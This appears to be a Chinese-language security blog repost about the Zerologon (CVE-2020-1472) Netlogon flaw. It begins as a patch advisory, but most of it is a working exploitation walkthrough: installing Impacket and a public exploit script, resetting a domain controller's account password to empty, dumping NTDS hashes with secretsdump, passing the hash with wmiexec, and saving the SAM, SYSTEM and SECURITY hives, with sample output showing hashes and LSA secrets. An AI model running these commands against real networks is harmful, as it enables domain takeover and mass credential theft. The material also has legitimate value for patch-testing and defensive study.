【漏洞預警】(CVE-2020-1472)被黑客廣泛應用

2021-02-21 Ots安全

2020年8月12日,阿里雲應急響應中心監測到,微軟發布了補丁來修復NetLogon特權升級漏洞(CVE-2020-1472),CVSS評分為10,官方評級為嚴重。目前,微軟已正式提供相應的每月安全補丁來修復此漏洞。

  2020年9月,一名外國黑客向Github公開上傳了該漏洞的驗證腳本PoC,並宣布了相關技術細節,這構成了很高的風險。

漏洞描述

  Microsoft在8月12日正式發布了安全更新,該更新修復了NetLogon特權升級漏洞(CVE-2020-1472)。攻擊者使用NetLogon(MS-NRPC)與域控制器建立易受攻擊的安全通道。何時可以使用此漏洞來訪問域管理。成功利用此漏洞的攻擊者可以在網絡中的設備上運行相應的代碼或程序。同時,Microsoft的August補丁還涉及許多其他高風險漏洞。阿里雲應急響應中心提醒Windows用戶儘快安裝補丁,以防止漏洞攻擊。

CVE-2020-1472

CVE-2020-1472又名Zerologon的檢查和利用代碼

測試域控制器是否容易受到Zerologon攻擊,如果容易受到攻擊,它將把域控制器的帳戶密碼重置為空字符串。

注意:這可能會破壞生產環境中的內容(例如DNS功能,與複製域控制器的通信等);然後,目標客戶端將無法再向域進行身份驗證,並且只能通過手動操作來重新同步它們。

Zerologon原創性的研究和白皮書由塞庫拉(湯姆Tervoort) - https://www.secura.com/blog/zero-logon

利用

它將嘗試執行Netlogon身份驗證繞過。修補域控制器後,檢測腳本將在發送2000對RPC調用後放棄,從而認為目標不容易受到攻擊(錯誤的可能性為0.04%)。

僅當域控制器使用Active Directory中存儲的密碼來驗證登錄嘗試,而不是本地存儲的身份驗證時,該漏洞利用才會成功,因為當以此方式更改密碼時,只能在AD中進行更改。目標系統本身仍將在本地存儲其原始密碼。

安裝

需要Python 3.7或更高版本,virtualenv,pip和 Impacket庫的修改版本:nrpc.py(/ impacket / dcerpc / v5)來自GitHub的最新版本的impacket,其中添加了netlogon結構。

1.如下安裝Impacket:

git clone https://github.com/SecureAuthCorp/impacket

cd impacket

pwd
~/impacket/

virtualenv --python=python3 impacket

source impacket/bin/activate

pip install --upgrade pip

pip install .

2.如下安裝Zerologon漏洞腳本:
~/impacket/

cd example

git clone https://github.com/VoidSec/CVE-2020-1472

cd CVE-2020-1472

pip install -r requirements.txt

運行腳本

該腳本可用於定位DC或備用DC。它也可能會針對只讀DC工作,但是尚未經過測試。DC名稱應為其NetBIOS計算機名稱。如果此名稱不正確,則腳本可能會因STATUS_INVALID_COMPUTER_NAME錯誤而失敗。給定一個名為EXAMPLE-DC和IP位址的域控制器1.2.3.4,按如下所示運行腳本:

運行該腳本應導致域控制器的帳戶密碼重置為空字符串。

在這一點上,您應該能夠運行Impacket的secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR(也可以使用空的hash :)-hashes :31d6cfe0d16ae931b73c59d7e0c089c0,它將僅提取NTDS.DIT數據(NTLM哈希和Kerberos密鑰)。

哪個應該讓您獲得域管理員。雙贏雙贏

示例運行

> cve-2020-1472-exploit.py -n WIN-U4Q9LLP6L2A -t 192.168.209.129
[+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.

> secretsdump.py -no-pass -just-dc ad.test.com/WIN-U4Q9LLP6L2A\$@192.168.209.129
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Restore:
> wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe ad.test.com/Administrator@192.168.209.129
- reg save HKLM\SYSTEM system.save
- reg save HKLM\SAM sam.save
- reg save HKLM\SECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save

> secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
[*] Target system bootKey: 0x31f99ee2e750274d1fee930ab88fe126
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:ef464f4194d9f401af41c9982dc7c85524cc9ed8adef4fe24c8044d13f1ae41c594131d2d46cab3a0d3384cda94baae65d5a87d26df1201ff6ff1697672ac4e16c16f0e514f6e54d84342c5af4193fe96329e3a30fb84c08845e7a86dac4295276c7c2e3181555fa5eef21d4d1f469550f4706383327b299283f72b7df6b661cfb11189bd8b3ab552ffb99aa12ffe19b760e00e143ef3e776d8377da57925c5ed71aa9f0991acff7fc9c963addb8496fdd273f231e15a51d99f41a770de714573b26795c45a03eac80e3bb45ac5c100740da5814c3979e5349e8471623086c80f6160163f4bd56da3b75a6deb17b1020
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9b5ccb9700e3ed723df08132357ff6a1
[*] DPAPI_SYSTEM
dpapi_machinekey:0xaf83406b2611f18ac99329079e9f47d9409e885f
dpapi_userkey:0x53ed555f11c110f918fc9a97a6c3576266930fb7
[*] NL$KM
0000 55 A7 DF DF 27 E2 64 C1 F7 42 F2 1B 96 76 01 4F U...'.d..B...v.O
0010 24 4C 5D 9B 20 E3 EA 95 DD E9 61 0F 00 8E B2 51 $L]. a....Q
0020 B1 79 3F E0 37 3E CB B2 95 31 A6 74 F3 35 54 8A .y?.7>...1.t.5T.
0030 C1 B6 70 3D B3 AB AC C1 7E 8E 90 7A 7B 49 32 46 ..p=....~..z{I2F
NL$KM:55a7dfdf27e264c1f742f21b9676014f244c5d9b20e3ea95dde9610f008eb251b1793fe0373ecbb29531a674f335548ac1b6703db3abacc17e8e907a7b493246
[*] Cleaning up...

密碼還原

要使DC繼續正常運行,必須重新安裝原始密碼哈希。

獲得Domain Admin之後,您可以wmiexec.py使用從secretsdump獲得的憑據到目標DC,並執行以下步驟:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

跑: secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

那應該向您顯示計算機帳戶的原始NT哈希。然後,您可以使用此處reinstall_original_pw.py提供的腳本將原始計算機帳戶哈希值重新安裝到域中。

漏洞測試工具:

https://github.com/VoidSec/CVE-2020-1472

相關焦點

  • ZeroLogon(CVE-2020-1472) 分析與狩獵
    2020年9月11日,安全公司Secura發布了公告,披露了Microsoft在2020年8月修補的漏洞細節(CVE-2020-1472
  • NetLogon 域內提權漏洞(CVE-2020-1472)復現過程
    大家好,這裡是 滲透攻擊紅隊 的第 46 篇文章,本公眾號會記錄一些紅隊攻擊的筆記(由淺到深),不定時更新CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞,攻擊者通過NetLogon,建立與域控間易受攻擊的安全通道時
  • 漏洞風險提示|Netlogon 特權提升漏洞(CVE-2020-1472)
    Netlogon 特權提升漏洞(CVE-2020-1472)NetLogon 遠程協議是一種在 Windows 域控上使用的 RPC 接口,被用於各種與用戶和機器認證相關的任務。微軟MSRC於8月11日 發布了Netlogon 特權提升漏洞安全通告。此漏洞CVE編號CVE-2020-1472, CVSS 評分:10.0。由 Secura 公司的 Tom Tervoort 發現提交並命名為 ZeroLogon。在9月11日,漏洞發現者在 GitHub 上公開了漏洞測試工具並且放出了漏洞白皮書。
  • 微軟NetLogon權限提升 CVE-2020-1472 漏洞復現
    最常用於讓用戶使用 NTLM 協議登錄伺服器,也用於 NTP 響應認證以及更新計算機域密碼微軟MSRC於8月11日 發布了Netlogon 特權提升漏洞安全通告。此漏洞CVE編號CVE-2020-1472, CVSS 評分:10.0。
  • CVE-2020-1472漏洞分析
    Netlogon 特權提升漏洞(CVE-2020-1472)
  • CVE-2020-1472 NetLogon特權提升漏洞深入分析
    近日,大連網絡安全信息通報機制合作單位新華三集團提醒,微軟發布補丁修復了NetLogon權限提升漏洞(CVE-2020-1472,Zerologon),漏洞等級為嚴重級別 ,CVSS漏洞評分10分。漏洞背景2020年8月13日,微軟發布補丁修復了NetLogon權限提升漏洞(CVE-2020-1472,Zerologon),漏洞等級為嚴重級別 ,CVSS漏洞評分10分。2020年9月,國外安全廠商公開發布了NetLogon權限提升漏洞的驗證腳本和詳細的技術分析,同時該漏洞的利用工具也在github上公開,導致該漏洞被廣泛利用的風險大大提升。
  • ZeroLogon漏洞(CVE-2020-1472)防禦性指南
    關於Zerologon(CVE-2020-1472)2020年09月11日,安全研究專家Tom Tomvvort發布了一篇安全博文
  • CVE-2020-1472漏洞實戰 深度剖析
    CVE-2020-1472是繼MS17010之後一個比較好用的內網提權漏洞,影響Windows Server 2008R 2至Windows Server 2019的多個版本系統,只要攻擊者能訪問到目標域控井且知道域控計算機名即可利用該漏洞.該漏洞不要求當前計算機在域內,也不要求當前計算機作業系統為windows
  • 技術乾貨 | CVE-2020-1472 ZeroLogon漏洞分析利用
    歡迎各位添加微信號:asj-jacky加入安世加 交流群 和大佬們一起交流安全技術0x01漏洞簡介CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞,此漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS評分為10分。
  • Samba UAF(CVE-2017-14746)和內存洩露漏洞(CVE-2017-15275)預警
    0x00 事件描述        Samba作為Linux和UNIX系統上實現SMB協議的一個免費軟體,在*nix領域有很廣泛的應用場景
  • CVE-2020-13699: TeamViewer 用戶密碼破解漏洞通告
    報告編號:B6-2020-081002報告來源:360CERT報告作者:360CERT更新日期:2020-08-100x01 漏洞簡述2020年08月10日,360CERT監測發現TeamViewer官方發布了TeamViewerURL處理的風險通告,該漏洞編號為CVE-2020-13699,漏洞等級:高危,漏洞評分:8.8分。
  • CVE-2020-1472: NetLogon特權提升漏洞分析
    c、執行命令:python3 CVE-2020-1472.py WIN-CQTUN83PA9O WIN-CQTUN83PA9O$ 192.168.148.134一旦發現challenge至少兩個字節不同,認為是沒有漏洞的。微軟認為以 11111, 22222, 33333這種開頭的challenge也可能造成漏洞,雖然概率更小。
  • Netlogon 特權提升漏洞(CVE-2020-1472)原理分析與驗證
    CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞。它是因為微軟在Netlogon協議中沒有正確使用加密算法而導致的漏洞。由於微軟在進行AES加密運算過程中,使用了AES-CFB8模式並且錯誤的將IV設置為全零,這使得攻擊者在明文(client challenge)、IV等要素可控的情況下,存在較高概率使得產生的密文為全零。下面就整個攻擊過程做一個簡要分析。
  • ZeroLogon(CVE-2020-1472) 漏洞的攻擊與防禦策略(上)
    什麼是ZeroLogon?Zerologon漏洞也稱為CVE-2020-1472,它影響MS-NRPC所使用的加密身份驗證方案(AES-CFB8),該方案具有多種用途,但最廣為人知的原因是更改計算機帳戶密碼的能力,這可能導致Windows被攻擊。該漏洞影響重大,風險評分達10.0滿分。微軟已在8月Patch Tuesday安全更新中將之修復。
  • ZeroLogon(CVE-2020-1472) 漏洞的攻擊與防禦策略(下)
    應用Microsoft的2020年8月11日補丁,就可以得到每個作業系統的KB編號的完整列表。此外,MS將於2021年2月9日發布更新,這將打開DC強制執行模式。安裝了2020年8月或更高版本進行更新後,請在域控制器中的事件日誌中查看系統事件日誌中的以下事件:1.如果連接被拒絕,則記錄事件ID 5827和5828;2.如果「域控制器:允許易受攻擊的Netlogon安全通道連接」組策略允許連接,則記錄事件ID 5830和5831;3.只要允許存在漏洞的Netlogon安全通道連接,就記錄事件ID 5829
  • CVE-2020-1472 Netlogon權限提升漏洞分析
    目錄 一、漏洞信息      1. 漏洞簡述      2. 組件概述      3. 漏洞利用      4. 漏洞影響      5. 解決方案二、漏洞復現       1.漏洞防禦          1)流量側          2)終端側五、參考文獻六、特別聲明CVE-2020-1472,也稱Zerologon漏洞。該漏洞為微軟2020年8月份補丁日例行更新時公開的漏洞,以其10分的CVSS評分在當時引起諸多研究員重視。
  • CVE-2020-1472 NetLogon 權限提升漏洞研究
    CVE-2020-1472 NetLogon 權限提升漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS漏洞評分10分,漏洞利用後果嚴重,未經身份認證的攻擊者可通過使用 Netlogon 遠程協議(MS-NRPC)連接域控制器來利用此漏洞。成功利用此漏洞的攻擊者可獲得域管理員訪問權限。
  • 『紅藍對抗』NetLogon權限提升漏洞
    2020-1472。0x00 前言在學習內網滲透中利用到了cve-2020-1472漏洞,這裡做一下簡單的復現。0x01 漏洞復現1.1 漏洞描述攻擊者通過NetLogon遠程協議(MS-NRPC)建立與域控制器連接的Netlogon安全通道時,可以利用此漏洞獲取域控制器的管理員權限。
  • TeamViewer 遠程代碼執行漏洞通告 (CVE-2020-13699)
    2020年8月6日,TeamViewer官方發布了TeamViewer URL處理的風險通告。TeamViewer存在未引用的搜索路徑或元素的安全缺陷,由於應用程式沒有正確引用它的自定義URI處理程序,當安裝了TeamViewer的易受攻擊版本的用戶訪問惡意創建的網站時,可能會被黑客利用。深信服安全研究團隊依據漏洞重要性和影響力進行評估,作出漏洞通告。
  • CVE-2021-3156:Sudo 堆緩衝區溢出漏洞通告
    收錄於話題 #漏洞預警